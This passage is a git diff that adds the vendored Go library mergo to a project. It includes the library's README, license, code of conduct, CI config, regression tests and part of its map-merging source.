+*.dll
+*.so
+*.dylib
+
+# Test binary, build with `go test -c`
+*.test
+
+# Output of the go coverage tool, specifically when used with LiteIDE
+*.out
+
+# Project-local glide cache, RE: https://github.com/Masterminds/glide/issues/736
+.glide/
+
+#### vim ####
+# Swap
+[._]*.s[a-v][a-z]
+[._]*.sw[a-p]
+[._]s[a-v][a-z]
+[._]sw[a-p]
+
+# Session
+Session.vim
+
+# Temporary
+.netrwhist
+*~
+# Auto-generated tag files
+tags
diff --git a/vendor/github.com/imdario/mergo/.travis.yml b/vendor/github.com/imdario/mergo/.travis.yml
new file mode 100644
index 0000000000..b13a50ed1f
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/.travis.yml
@@ -0,0 +1,7 @@
+language: go
+install:
+  - go get -t
+  - go get golang.org/x/tools/cmd/cover
+  - go get github.com/mattn/goveralls
+script:
+  - $HOME/gopath/bin/goveralls -service=travis-ci -repotoken $COVERALLS_TOKEN
diff --git a/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md
new file mode 100644
index 0000000000..469b44907a
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md
@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at i@dario.im. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/
diff --git a/vendor/github.com/imdario/mergo/LICENSE b/vendor/github.com/imdario/mergo/LICENSE
new file mode 100644
index 0000000000..686680298d
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/LICENSE
@@ -0,0 +1,28 @@
+Copyright (c) 2013 Dario Castañé. All rights reserved.
+Copyright (c) 2012 The Go Authors. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+   * Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+   * Redistributions in binary form must reproduce the above
+copyright notice, this list of conditions and the following disclaimer
+in the documentation and/or other materials provided with the
+distribution.
+   * Neither the name of Google Inc. nor the names of its
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/vendor/github.com/imdario/mergo/README.md b/vendor/github.com/imdario/mergo/README.md
new file mode 100644
index 0000000000..d1cefa8718
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/README.md
@@ -0,0 +1,222 @@
+# Mergo
+
+A helper to merge structs and maps in Golang. Useful for configuration default values, avoiding messy if-statements.
+
+Also a lovely [comune](http://en.wikipedia.org/wiki/Mergo) (municipality) in the Province of Ancona in the Italian region of Marche.
+
+## Status
+
+It is ready for production use. [It is used in several projects by Docker, Google, The Linux Foundation, VMWare, Shopify, etc](https://github.com/imdario/mergo#mergo-in-the-wild).
+
+[![GoDoc][3]][4]
+[![GoCard][5]][6]
+[![Build Status][1]][2]
+[![Coverage Status][7]][8]
+[![Sourcegraph][9]][10]
+
+[1]: https://travis-ci.org/imdario/mergo.png
+[2]: https://travis-ci.org/imdario/mergo
+[3]: https://godoc.org/github.com/imdario/mergo?status.svg
+[4]: https://godoc.org/github.com/imdario/mergo
+[5]: https://goreportcard.com/badge/imdario/mergo
+[6]: https://goreportcard.com/report/github.com/imdario/mergo
+[7]: https://coveralls.io/repos/github/imdario/mergo/badge.svg?branch=master
+[8]: https://coveralls.io/github/imdario/mergo?branch=master
+[9]: https://sourcegraph.com/github.com/imdario/mergo/-/badge.svg
+[10]: https://sourcegraph.com/github.com/imdario/mergo?badge
+
+### Latest release
+
+[Release v0.3.4](https://github.com/imdario/mergo/releases/tag/v0.3.4).
+
+### Important note
+
+Please keep in mind that in [0.3.2](//github.com/imdario/mergo/releases/tag/0.3.2) Mergo changed `Merge()`and `Map()` signatures to support [transformers](#transformers). An optional/variadic argument has been added, so it won't break existing code.
+
+If you were using Mergo **before** April 6th 2015, please check your project works as intended after updating your local copy with ```go get -u github.com/imdario/mergo```. I apologize for any issue caused by its previous behavior and any future bug that Mergo could cause (I hope it won't!) in existing projects after the change (release 0.2.0).
+
+### Donations
+
+If Mergo is useful to you, consider buying me a coffee, a beer or making a monthly donation so I can keep building great free software. :heart_eyes:
+
+<a href='https://ko-fi.com/B0B58839' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://az743702.vo.msecnd.net/cdn/kofi1.png?v=0' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
+[![Beerpay](https://beerpay.io/imdario/mergo/badge.svg)](https://beerpay.io/imdario/mergo)
+[![Beerpay](https://beerpay.io/imdario/mergo/make-wish.svg)](https://beerpay.io/imdario/mergo)
+<a href="https://liberapay.com/dario/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a>
+
+### Mergo in the wild
+
+- [moby/moby](https://github.com/moby/moby)
+- [kubernetes/kubernetes](https://github.com/kubernetes/kubernetes)
+- [vmware/dispatch](https://github.com/vmware/dispatch)
+- [Shopify/themekit](https://github.com/Shopify/themekit)
+- [imdario/zas](https://github.com/imdario/zas)
+- [matcornic/hermes](https://github.com/matcornic/hermes)
+- [OpenBazaar/openbazaar-go](https://github.com/OpenBazaar/openbazaar-go)
+- [kataras/iris](https://github.com/kataras/iris)
+- [michaelsauter/crane](https://github.com/michaelsauter/crane)
+- [go-task/task](https://github.com/go-task/task)
+- [sensu/uchiwa](https://github.com/sensu/uchiwa)
+- [ory/hydra](https://github.com/ory/hydra)
+- [sisatech/vcli](https://github.com/sisatech/vcli)
+- [dairycart/dairycart](https://github.com/dairycart/dairycart)
+- [projectcalico/felix](https://github.com/projectcalico/felix)
+- [resin-os/balena](https://github.com/resin-os/balena)
+- [go-kivik/kivik](https://github.com/go-kivik/kivik)
+- [Telefonica/govice](https://github.com/Telefonica/govice)
+- [supergiant/supergiant](supergiant/supergiant)
+- [SergeyTsalkov/brooce](https://github.com/SergeyTsalkov/brooce)
+- [soniah/dnsmadeeasy](https://github.com/soniah/dnsmadeeasy)
+- [ohsu-comp-bio/funnel](https://github.com/ohsu-comp-bio/funnel)
+- [EagerIO/Stout](https://github.com/EagerIO/Stout)
+- [lynndylanhurley/defsynth-api](https://github.com/lynndylanhurley/defsynth-api)
+- [russross/canvasassignments](https://github.com/russross/canvasassignments)
+- [rdegges/cryptly-api](https://github.com/rdegges/cryptly-api)
+- [casualjim/exeggutor](https://github.com/casualjim/exeggutor)
+- [divshot/gitling](https://github.com/divshot/gitling)
+- [RWJMurphy/gorl](https://github.com/RWJMurphy/gorl)
+- [andrerocker/deploy42](https://github.com/andrerocker/deploy42)
+- [elwinar/rambler](https://github.com/elwinar/rambler)
+- [tmaiaroto/gopartman](https://github.com/tmaiaroto/gopartman)
+- [jfbus/impressionist](https://github.com/jfbus/impressionist)
+- [Jmeyering/zealot](https://github.com/Jmeyering/zealot)
+- [godep-migrator/rigger-host](https://github.com/godep-migrator/rigger-host)
+- [Dronevery/MultiwaySwitch-Go](https://github.com/Dronevery/MultiwaySwitch-Go)
+- [thoas/picfit](https://github.com/thoas/picfit)
+- [mantasmatelis/whooplist-server](https://github.com/mantasmatelis/whooplist-server)
+- [jnuthong/item_search](https://github.com/jnuthong/item_search)
+- [bukalapak/snowboard](https://github.com/bukalapak/snowboard)
+
+## Installation
+
+    go get github.com/imdario/mergo
+
+    // use in your .go code
+    import (
+        "github.com/imdario/mergo"
+    )
+
+## Usage
+
+You can only merge same-type structs with exported fields initialized as zero value of their type and same-types maps. Mergo won't merge unexported (private) fields but will do recursively any exported one. It won't merge empty structs value as [they are not considered zero values](https://golang.org/ref/spec#The_zero_value) either. Also maps will be merged recursively except for structs inside maps (because they are not addressable using Go reflection).
+
+```go
+if err := mergo.Merge(&dst, src); err != nil {
+    // ...
+}
+```
+
+Also, you can merge overwriting values using the transformer `WithOverride`.
+
+```go
+if err := mergo.Merge(&dst, src, mergo.WithOverride); err != nil {
+    // ...
+}
+```
+
+Additionally, you can map a `map[string]interface{}` to a struct (and otherwise, from struct to map), following the same restrictions as in `Merge()`. Keys are capitalized to find each corresponding exported field.
+
+```go
+if err := mergo.Map(&dst, srcMap); err != nil {
+    // ...
+}
+```
+
+Warning: if you map a struct to map, it won't do it recursively. Don't expect Mergo to map struct members of your struct as `map[string]interface{}`. They will be just assigned as values.
+
+More information and examples in [godoc documentation](http://godoc.org/github.com/imdario/mergo).
+
+### Nice example
+
+```go
+package main
+
+import (
+	"fmt"
+	"github.com/imdario/mergo"
+)
+
+type Foo struct {
+	A string
+	B int64
+}
+
+func main() {
+	src := Foo{
+		A: "one",
+		B: 2,
+	}
+	dest := Foo{
+		A: "two",
+	}
+	mergo.Merge(&dest, src)
+	fmt.Println(dest)
+	// Will print
+	// {two 2}
+}
+```
+
+Note: if test are failing due missing package, please execute:
+
+    go get gopkg.in/yaml.v2
+
+### Transformers
+
+Transformers allow to merge specific types differently than in the default behavior. In other words, now you can customize how some types are merged. For example, `time.Time` is a struct; it doesn't have zero value but IsZero can return true because it has fields with zero value. How can we merge a non-zero `time.Time`?
+
+```go
+package main
+
+import (
+	"fmt"
+	"github.com/imdario/mergo"
+        "reflect"
+        "time"
+)
+
+type timeTransfomer struct {
+}
+
+func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error {
+	if typ == reflect.TypeOf(time.Time{}) {
+		return func(dst, src reflect.Value) error {
+			if dst.CanSet() {
+				isZero := dst.MethodByName("IsZero")
+				result := isZero.Call([]reflect.Value{})
+				if result[0].Bool() {
+					dst.Set(src)
+				}
+			}
+			return nil
+		}
+	}
+	return nil
+}
+
+type Snapshot struct {
+	Time time.Time
+	// ...
+}
+
+func main() {
+	src := Snapshot{time.Now()}
+	dest := Snapshot{}
+	mergo.Merge(&dest, src, mergo.WithTransformers(timeTransfomer{}))
+	fmt.Println(dest)
+	// Will print
+	// { 2018-01-12 01:15:00 +0000 UTC m=+0.000000001 }
+}
+```
+
+
+## Contact me
+
+If I can help you, you have an idea or you are using Mergo in your projects, don't hesitate to drop me a line (or a pull request): [@im_dario](https://twitter.com/im_dario)
+
+## About
+
+Written by [Dario Castañé](http://dario.im).
+
+## License
+
+[BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) license, as [Go language](http://golang.org/LICENSE).
diff --git a/vendor/github.com/imdario/mergo/doc.go b/vendor/github.com/imdario/mergo/doc.go
new file mode 100644
index 0000000000..6e9aa7baf3
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/doc.go
@@ -0,0 +1,44 @@
+// Copyright 2013 Dario Castañé. All rights reserved.
+// Copyright 2009 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+/*
+Package mergo merges same-type structs and maps by setting default values in zero-value fields.
+
+Mergo won't merge unexported (private) fields but will do recursively any exported one. It also won't merge structs inside maps (because they are not addressable using Go reflection).
+
+Usage
+
+From my own work-in-progress project:
+
+	type networkConfig struct {
+		Protocol string
+		Address string
+		ServerType string `json: "server_type"`
+		Port uint16
+	}
+
+	type FssnConfig struct {
+		Network networkConfig
+	}
+
+	var fssnDefault = FssnConfig {
+		networkConfig {
+			"tcp",
+			"127.0.0.1",
+			"http",
+			31560,
+		},
+	}
+
+	// Inside a function [...]
+
+	if err := mergo.Merge(&config, fssnDefault); err != nil {
+		log.Fatal(err)
+	}
+
+	// More code [...]
+
+*/
+package mergo
diff --git a/vendor/github.com/imdario/mergo/issue17_test.go b/vendor/github.com/imdario/mergo/issue17_test.go
new file mode 100644
index 0000000000..f9de805ab7
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue17_test.go
@@ -0,0 +1,25 @@
+package mergo
+
+import (
+	"encoding/json"
+	"testing"
+)
+
+var (
+	request    = `{"timestamp":null, "name": "foo"}`
+	maprequest = map[string]interface{}{
+		"timestamp": nil,
+		"name":      "foo",
+		"newStuff":  "foo",
+	}
+)
+
+func TestIssue17MergeWithOverwrite(t *testing.T) {
+	var something map[string]interface{}
+	if err := json.Unmarshal([]byte(request), &something); err != nil {
+		t.Errorf("Error while Unmarshalling maprequest: %s", err)
+	}
+	if err := MergeWithOverwrite(&something, maprequest); err != nil {
+		t.Errorf("Error while merging: %s", err)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue23_test.go b/vendor/github.com/imdario/mergo/issue23_test.go
new file mode 100644
index 0000000000..283f8c6a3f
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue23_test.go
@@ -0,0 +1,27 @@
+package mergo
+
+import (
+	"testing"
+	"time"
+)
+
+type document struct {
+	Created *time.Time
+}
+
+func TestIssue23MergeWithOverwrite(t *testing.T) {
+	now := time.Now()
+	dst := document{
+		&now,
+	}
+	expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC)
+	src := document{
+		&expected,
+	}
+	if err := MergeWithOverwrite(&dst, src); err != nil {
+		t.Errorf("Error while merging %s", err)
+	}
+	if !dst.Created.Equal(*src.Created) { //--> https://golang.org/pkg/time/#pkg-overview
+		t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue33_test.go b/vendor/github.com/imdario/mergo/issue33_test.go
new file mode 100644
index 0000000000..ae55ae236f
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue33_test.go
@@ -0,0 +1,33 @@
+package mergo
+
+import (
+	"testing"
+)
+
+type Foo struct {
+	Str    string
+	Bslice []byte
+}
+
+func TestIssue33Merge(t *testing.T) {
+	dest := Foo{Str: "a"}
+	toMerge := Foo{
+		Str:    "b",
+		Bslice: []byte{1, 2},
+	}
+	if err := Merge(&dest, toMerge); err != nil {
+		t.Errorf("Error while merging: %s", err)
+	}
+	// Merge doesn't overwrite an attribute if in destination it doesn't have a zero value.
+	// In this case, Str isn't a zero value string.
+	if dest.Str != "a" {
+		t.Errorf("dest.Str should have not been override as it has a non-zero value: dest.Str(%v) != 'a'", dest.Str)
+	}
+	// If we want to override, we must use MergeWithOverwrite or Merge using WithOverride.
+	if err := Merge(&dest, toMerge, WithOverride); err != nil {
+		t.Errorf("Error while merging: %s", err)
+	}
+	if dest.Str != toMerge.Str {
+		t.Errorf("dest.Str should have been override: dest.Str(%v) != toMerge.Str(%v)", dest.Str, toMerge.Str)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue38_test.go b/vendor/github.com/imdario/mergo/issue38_test.go
new file mode 100644
index 0000000000..286b68cb1c
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue38_test.go
@@ -0,0 +1,59 @@
+package mergo
+
+import (
+	"testing"
+	"time"
+)
+
+type structWithoutTimePointer struct {
+	Created time.Time
+}
+
+func TestIssue38Merge(t *testing.T) {
+	dst := structWithoutTimePointer{
+		time.Now(),
+	}
+
+	expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC)
+	src := structWithoutTimePointer{
+		expected,
+	}
+	if err := Merge(&dst, src); err != nil {
+		t.Errorf("Error while merging %s", err)
+	}
+	if dst.Created == src.Created {
+		t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created)
+	}
+}
+
+func TestIssue38MergeEmptyStruct(t *testing.T) {
+	dst := structWithoutTimePointer{}
+
+	expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC)
+	src := structWithoutTimePointer{
+		expected,
+	}
+	if err := Merge(&dst, src); err != nil {
+		t.Errorf("Error while merging %s", err)
+	}
+	if dst.Created == src.Created {
+		t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created)
+	}
+}
+
+func TestIssue38MergeWithOverwrite(t *testing.T) {
+	dst := structWithoutTimePointer{
+		time.Now(),
+	}
+
+	expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC)
+	src := structWithoutTimePointer{
+		expected,
+	}
+	if err := MergeWithOverwrite(&dst, src); err != nil {
+		t.Errorf("Error while merging %s", err)
+	}
+	if dst.Created != src.Created {
+		t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue50_test.go b/vendor/github.com/imdario/mergo/issue50_test.go
new file mode 100644
index 0000000000..89aa36345c
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue50_test.go
@@ -0,0 +1,18 @@
+package mergo
+
+import (
+	"testing"
+	"time"
+)
+
+type testStruct struct {
+	time.Duration
+}
+
+func TestIssue50Merge(t *testing.T) {
+	to := testStruct{}
+	from := testStruct{}
+	if err := Merge(&to, from); err != nil {
+		t.Fail()
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue52_test.go b/vendor/github.com/imdario/mergo/issue52_test.go
new file mode 100644
index 0000000000..62cd9fa7c0
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue52_test.go
@@ -0,0 +1,99 @@
+package mergo
+
+import (
+	"reflect"
+	"testing"
+	"time"
+)
+
+type structWithTime struct {
+	Birth time.Time
+}
+
+type timeTransfomer struct {
+	overwrite bool
+}
+
+func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error {
+	if typ == reflect.TypeOf(time.Time{}) {
+		return func(dst, src reflect.Value) error {
+			if dst.CanSet() {
+				if t.overwrite {
+					isZero := src.MethodByName("IsZero")
+					result := isZero.Call([]reflect.Value{})
+					if !result[0].Bool() {
+						dst.Set(src)
+					}
+				} else {
+					isZero := dst.MethodByName("IsZero")
+					result := isZero.Call([]reflect.Value{})
+					if result[0].Bool() {
+						dst.Set(src)
+					}
+				}
+			}
+			return nil
+		}
+	}
+	return nil
+}
+
+func TestOverwriteZeroSrcTime(t *testing.T) {
+	now := time.Now()
+	dst := structWithTime{now}
+	src := structWithTime{}
+	if err := MergeWithOverwrite(&dst, src); err != nil {
+		t.FailNow()
+	}
+	if !dst.Birth.IsZero() {
+		t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now)
+	}
+}
+
+func TestOverwriteZeroSrcTimeWithTransformer(t *testing.T) {
+	now := time.Now()
+	dst := structWithTime{now}
+	src := structWithTime{}
+	if err := MergeWithOverwrite(&dst, src, WithTransformers(timeTransfomer{true})); err != nil {
+		t.FailNow()
+	}
+	if dst.Birth.IsZero() {
+		t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now)
+	}
+}
+
+func TestOverwriteZeroDstTime(t *testing.T) {
+	now := time.Now()
+	dst := structWithTime{}
+	src := structWithTime{now}
+	if err := MergeWithOverwrite(&dst, src); err != nil {
+		t.FailNow()
+	}
+	if dst.Birth.IsZero() {
+		t.Fatalf("dst should have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{})
+	}
+}
+
+func TestZeroDstTime(t *testing.T) {
+	now := time.Now()
+	dst := structWithTime{}
+	src := structWithTime{now}
+	if err := Merge(&dst, src); err != nil {
+		t.FailNow()
+	}
+	if !dst.Birth.IsZero() {
+		t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{})
+	}
+}
+
+func TestZeroDstTimeWithTransformer(t *testing.T) {
+	now := time.Now()
+	dst := structWithTime{}
+	src := structWithTime{now}
+	if err := Merge(&dst, src, WithTransformers(timeTransfomer{})); err != nil {
+		t.FailNow()
+	}
+	if dst.Birth.IsZero() {
+		t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now)
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue61_test.go b/vendor/github.com/imdario/mergo/issue61_test.go
new file mode 100644
index 0000000000..8efa5e4570
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue61_test.go
@@ -0,0 +1,20 @@
+package mergo
+
+import (
+	"reflect"
+	"testing"
+)
+
+func TestIssue61MergeNilMap(t *testing.T) {
+	type T struct {
+		I map[string][]string
+	}
+	t1 := T{}
+	t2 := T{I: map[string][]string{"hi": {"there"}}}
+	if err := Merge(&t1, t2); err != nil {
+		t.Fail()
+	}
+	if !reflect.DeepEqual(t2, T{I: map[string][]string{"hi": {"there"}}}) {
+		t.FailNow()
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue64_test.go b/vendor/github.com/imdario/mergo/issue64_test.go
new file mode 100644
index 0000000000..32382bef16
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue64_test.go
@@ -0,0 +1,38 @@
+package mergo
+
+import (
+	"testing"
+)
+
+type Student struct {
+	Name  string
+	Books []string
+}
+
+var testData = []struct {
+	S1            Student
+	S2            Student
+	ExpectedSlice []string
+}{
+	{Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"a", "B"}},
+	{Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}},
+	{Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}},
+	{Student{"Jack", []string{}}, Student{"Tom", []string{}}, []string{}},
+}
+
+func TestIssue64MergeSliceWithOverride(t *testing.T) {
+	for _, data := range testData {
+		err := Merge(&data.S2, data.S1, WithOverride)
+		if err != nil {
+			t.Errorf("Error while merging %s", err)
+		}
+		if len(data.S2.Books) != len(data.ExpectedSlice) {
+			t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice))
+		}
+		for i, val := range data.S2.Books {
+			if val != data.ExpectedSlice[i] {
+				t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/issue66_test.go b/vendor/github.com/imdario/mergo/issue66_test.go
new file mode 100644
index 0000000000..9e4bccedcb
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/issue66_test.go
@@ -0,0 +1,48 @@
+package mergo
+
+import (
+	"testing"
+)
+
+type PrivateSliceTest66 struct {
+	PublicStrings  []string
+	privateStrings []string
+}
+
+func TestPrivateSlice(t *testing.T) {
+	p1 := PrivateSliceTest66{
+		PublicStrings:  []string{"one", "two", "three"},
+		privateStrings: []string{"four", "five"},
+	}
+	p2 := PrivateSliceTest66{
+		PublicStrings: []string{"six", "seven"},
+	}
+	if err := Merge(&p1, p2); err != nil {
+		t.Fatalf("Error during the merge: %v", err)
+	}
+	if len(p1.PublicStrings) != 3 {
+		t.Error("5 elements should be in 'PublicStrings' field")
+	}
+	if len(p1.privateStrings) != 2 {
+		t.Error("2 elements should be in 'privateStrings' field")
+	}
+}
+
+func TestPrivateSliceWithAppendSlice(t *testing.T) {
+	p1 := PrivateSliceTest66{
+		PublicStrings:  []string{"one", "two", "three"},
+		privateStrings: []string{"four", "five"},
+	}
+	p2 := PrivateSliceTest66{
+		PublicStrings: []string{"six", "seven"},
+	}
+	if err := Merge(&p1, p2, WithAppendSlice); err != nil {
+		t.Fatalf("Error during the merge: %v", err)
+	}
+	if len(p1.PublicStrings) != 5 {
+		t.Error("5 elements should be in 'PublicStrings' field")
+	}
+	if len(p1.privateStrings) != 2 {
+		t.Error("2 elements should be in 'privateStrings' field")
+	}
+}
diff --git a/vendor/github.com/imdario/mergo/map.go b/vendor/github.com/imdario/mergo/map.go
new file mode 100644
index 0000000000..6ea38e636b
--- /dev/null
+++ b/vendor/github.com/imdario/mergo/map.go
@@ -0,0 +1,174 @@
+// Copyright 2014 Dario Castañé. All rights reserved.
+// Copyright 2009 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Based on src/pkg/reflect/deepequal.go from official
+// golang's stdlib.
+
+package mergo
+
+import (
+	"fmt"
+	"reflect"
+	"unicode"
+	"unicode/utf8"
+)
+
+func changeInitialCase(s string, mapper func(rune) rune) string {
+	if s == "" {
+		return s
+	}
+	r, n := utf8.DecodeRuneInString(s)
+	return string(mapper(r)) + s[n:]
+}
+
+func isExported(field reflect.StructField) bool {
+	r, _ := utf8.DecodeRuneInString(field.Name)
+	return r >= 'A' && r <= 'Z'
+}
+
+// Traverses recursively both values, assigning src's fields values to dst.
+// The map argument tracks comparisons that have already been seen, which allows
+// short circuiting on recursive types.
+func deepMap(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) {
+	overwrite := config.Overwrite
+	if dst.CanAddr() {
+		addr := dst.UnsafeAddr()
+		h := 17 * addr
+		seen := visited[h]
+		typ := dst.Type()
+		for p := seen; p != nil; p = p.next {
+			if p.ptr == addr && p.typ == typ {
+				return nil
+			}
+		}
+		// Remember, remember...
+		visited[h] = &visit{addr, typ, seen}
+	}
+	zeroValue := reflect.Value{}
+	switch dst.Kind() {
+	case reflect.Map:
+		dstMap := dst.Interface().(map[string]interface{})
+		for i, n := 0, src.NumField(); i < n; i++ {
+			srcType := src.Type()
+			field := srcType.Field(i)
+			if !isExported(field) {
+				continue
+			}
+			fieldName := field.Name
+			fieldName = changeInitialCase(fieldName, unicode.ToLower)
+			if v, ok := dstMap[fieldName]; !ok || (isEmptyValue(reflect.ValueOf(v)) || overwrite) {
+				dstMap[fieldName] = src.Field(i).Interface()
+			}
+		}
+	case reflect.Ptr:
+		if dst.IsNil() {
+			v := reflect.New(dst.Type().Elem())
+			dst.Set(v)
+		}
+		dst = dst.Elem()
+		fallthrough
+	case reflect.Struct:
+		srcMap := src.Interface().(map[string]interface{})
+		for key := range srcMap {
+			srcValue := srcMap[key]
+			fieldName := changeInitialCase(key, unicode.ToUpper)
+			dstElement := dst.FieldByName(fieldName)
+			if dstElement == zeroValue {
+				// We discard it because the field doesn't exist.
+				continue
+			}
+			srcElement := reflect.ValueOf(srcValue)
+			dstKind := dstElement.Kind()
+			srcKind := srcElement.Kind()
+			if srcKind == reflect.Ptr && dstKind != reflect.Ptr {
+				srcElement = srcElement.Elem()
+				srcKind = reflect.TypeOf(srcElement.Interface()).Kind()
+			} else if dstKind == reflect.Ptr {
+				// Can this work? I guess it can't.
+				if srcKind != reflect.Ptr && srcElement.CanAddr() {
+					srcPtr := srcElement.Addr()
+					srcElement = reflect.ValueOf(srcPtr)
+					srcKind = reflect.Ptr
+				}
+			}
+
+			if !srcElement.IsValid() {
+				continue
+			}
+			if srcKind == dstKind {
+				if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil {
+					return
+				}
+			} else if dstKind == reflect.Interface && dstElement.Kind() == reflect.Interface {
+				if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil {
+					return
+				}
+			} else if srcKind == reflect.Map {
+				if err = deepMap(dstElement, srcElement, visited, depth+1, config); err != nil {
+					return
+				}
+			} else {
+				return fmt.Errorf("type mismatch on %s field: found %v, expected %v", fieldName, srcKind, dstKind)
+			}
+		}
+	}
+	return
+}
+
+// Map sets fields' values in dst from src.
+// src can be a map with string keys or a struct. dst must be the opposite:
